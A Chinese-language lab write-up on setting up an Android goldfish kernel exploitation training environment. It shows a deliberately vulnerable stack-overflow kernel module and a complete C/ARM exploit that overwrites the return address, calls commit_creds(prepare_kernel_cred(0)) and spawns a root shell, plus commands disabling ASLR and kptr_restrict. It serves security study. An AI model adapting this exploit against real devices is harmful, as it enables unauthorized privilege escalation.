搭建环境过于艰辛,做个记录....
- 参考链接:
环境搭建
- 内核代码下载
git clone https://aosp.tuna.tsinghua.edu.cn/kernel/goldfish.git
- 漏洞项目代码下载
git clone https://github.com/Fuzion24/AndroidKernelExploitationPlayground.git kernel_exploit_challenges
- 内核编译 和 准备工作:
- 准备 | 将 漏洞模块 编译进内核
cd goldfish && git checkout -t origin/android-goldfish-3.4 &&
git am --signoff < ../kernel_exploit_challenges/kernel_build/debug_symbols_and_challenges.patch &&
cd .. && ln -s $(pwd)/kernel_exploit_challenges/ goldfish/drivers/vulnerabilities - 准备编译工具
- 下载 arm-linux-androideabi-4.6.tar.bz2
- tar xvf arm-linux-androideabi-4.6.tar.bz2
- export PATH=
PATH | 推荐将指令加入 〜/ .bashrc 一劳永逸
- 编译指令(在 goldfish 目录下)
- make goldfish_armv7_defconfig && make -j8
- 准备 | 将 漏洞模块 编译进内核
- 安卓环境准备
- 安卓sdk
- 解压 : tar xvf android-sdk_r24.4.1-linux.tgz
- 加入环境变量 : export PATH=/home/haclh/hacktools/android-sdk-linux/tools:$PATH
- 下载jdk
- 新开一个 shell , 运行 android (需要在加入环境变量步骤后使用)
-
下载下图中指定的jdk
image.png -
下载后通过 android list targets 指令可以查看所有下载的 镜像文件
image.png
- 创建模拟器
- android create avd --force -t "android-19" -n kernel_challenges
- 使用内核运行模拟器
- emulator -show-kernel -kernel arch/arm/boot/zImage -avd kernel_challenges -no-boot-anim -no-skin -no-audio -no-window -qemu -monitor unix:/tmp/qemuSocket,server,nowait -s
- android 动态调试 (goldfish 目录下运行如下指令)
- arm-linux-androideabi-gdb vmlinux
第一次尝试 | 内核栈溢出提权
- 首先看看漏洞代码, kernel_exploit_challenges / challenge / stack_buffer_overflow / module / stack_buffer_overflow.c :
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/proc_fs.h>
#include <linux/string.h>
#include <asm/uaccess.h>
#define MAX_LENGTH 64
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Ryan Welton");
MODULE_DESCRIPTION("Stack Buffer Overflow Example");
static struct proc_dir_entry *stack_buffer_proc_entry;
int proc_entry_write(struct file *file, const char __user *ubuf, unsigned long count, void *data)
{
char buf[MAX_LENGTH];
if (copy_from_user(&buf, ubuf, count)) {
printk(KERN_INFO "stackBufferProcEntry: error copying data from userspacen");
return -EFAULT;
}
return count;
}
static int __init stack_buffer_proc_init(void)
{
stack_buffer_proc_entry = create_proc_entry("stack_buffer_overflow", 0666, NULL);
stack_buffer_proc_entry->write_proc = proc_entry_write;
printk(KERN_INFO "created /proc/stack_buffer_overflown");
return 0;
}
static void __exit stack_buffer_proc_exit(void)
{
if (stack_buffer_proc_entry) {
remove_proc_entry("stack_buffer_overflow", stack_buffer_proc_entry);
}
printk(KERN_INFO "vuln_stack_proc_entry removedn");
}
module_init(stack_buffer_proc_init);
module_exit(stack_buffer_proc_exit);
-
相关知识点
- 提权基础
- 用户态 | 内核态 区别 (EL1 | EL0 权限等级)
- 提权思路 : 利用 EL1 权限下可以执行的 EL0 级别的操作中的漏洞 , 在EL0 级别的操作过程中做到命令执行 , 提升用户等级 , 并反弹shell , 从而做到普通用户到 root 的提权 | 描述方式需要修改。。。
- 驱动编程 | 在这次利用过程中必要的知识
- 注册驱动 | module_init , open 时调用
- stack_buffer_proc_entry->write_proc | 当对这个设备写入时 , 会调用 write_proc 对应的函数
- copy_from_user(&buf,ubuf,count) 从用户空间拷贝数据到buf
- 回到用户态:
- 下面就是要回到用户态,在x86平台有iret指令可以回到用户态,在arm下返回用户态就更简单了。在arm下cpsr寄存器的M [4: 0]位用来表示处理器的运行模式,具体可以看这个。所以我们把cpsr寄存器的M [4:0]位设置为10000后就表示处理器进入了用户模式。
- 提权基础
-
漏洞点 :
- proc_entry_write 没有对输入长度或字符内容做限制,造成栈溢出
-
这次可能遇到的相关缓解措施 及其缓解手段
- ASLR
- 堆栈地址随机化 , 意味着shellcode地址需要动态调整
- 关闭方式 : echo 0 > proc/sys/kernel/randomize_va_space
- kptr_restrict
- 内核层 的 pie | 动态加载 内核符号
- /proc/kallsyms文件中保存着所有的内核符号的名称和它在内存中的位置
- 关闭方式 : echo 0 > proc/sys/kernel/kptr_restrict
- 相关作用 : 获取 commit_creds 和 prepare_kernel_cred 符号的地址,用来提权时使用
- ASLR
具体的利用思路:
- 1.调用 commit_creds(prepare_kernel_cred(0)) 提升权限
- 2.调用 mov r3,#0x40000010; MSR CPSR_c,R3; 设置 cpsr 寄存器, 使cpu进入用户模式
- 3.然后执行 execl(“/ system / bin / sh”,“sh”,NULL); 起一个 root 权限的 shellEXP:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#define MAX 68
int open_file(void)
{
int fd = open("/proc/stack_buffer_overflow", O_RDWR);
if (fd == -1)
err(1, "open");
return fd;
}
void payload(void)
{
printf("[+] enjoy the shelln");
execl("/system/bin/sh", "sh", NULL);
}
extern uint32_t shellCode[];
asm
(
" .text\n"
" .align 2\n"
" .code 32\n"
" .globl shellCode\n\t"
"shellCode:\n\t"
// commit_creds(prepare_kernel_cred(0));
// -> get root
"LDR R3, =0xc0039d34\n\t" //prepare_kernel_cred addr
"MOV R0, #0\n\t"
"BLX R3\n\t"
"LDR R3, =0xc0039834\n\t" //commit_creds addr
"BLX R3\n\t"
"mov r3, #0x40000010\n\t"
"MSR CPSR_c,R3\n\t"
"LDR R3, =0x826d\n\t" // payload function addr
"BLX R3\n\t"
);
void trigger_vuln(int fd)
{
#define MAX_PAYLOAD (MAX + 4)
char buf[MAX_PAYLOAD];
memset(buf, 'A', sizeof(buf));
void * pc = buf + MAX;
*(void **)pc = (void *) shellCode; //ret addr
/* Kaboom! */
write(fd, buf, MAX_PAYLOAD );
}
int main(void)
{
int fd;
printf("shellcdoe addr: %p\n", shellCode);
printf("payload:%p\n", payload);
fd = open_file();
trigger_vuln(fd);
close(fd);
}
- tip :在本地测试会遇到的坑点
- 本次测试的漏洞时 栈溢出 , 可能在本地环境偏移不同
- payload 加载地址变化
- Illegal instruction | 非法指令 , 此报错执行exp 未进入内核态的操作.
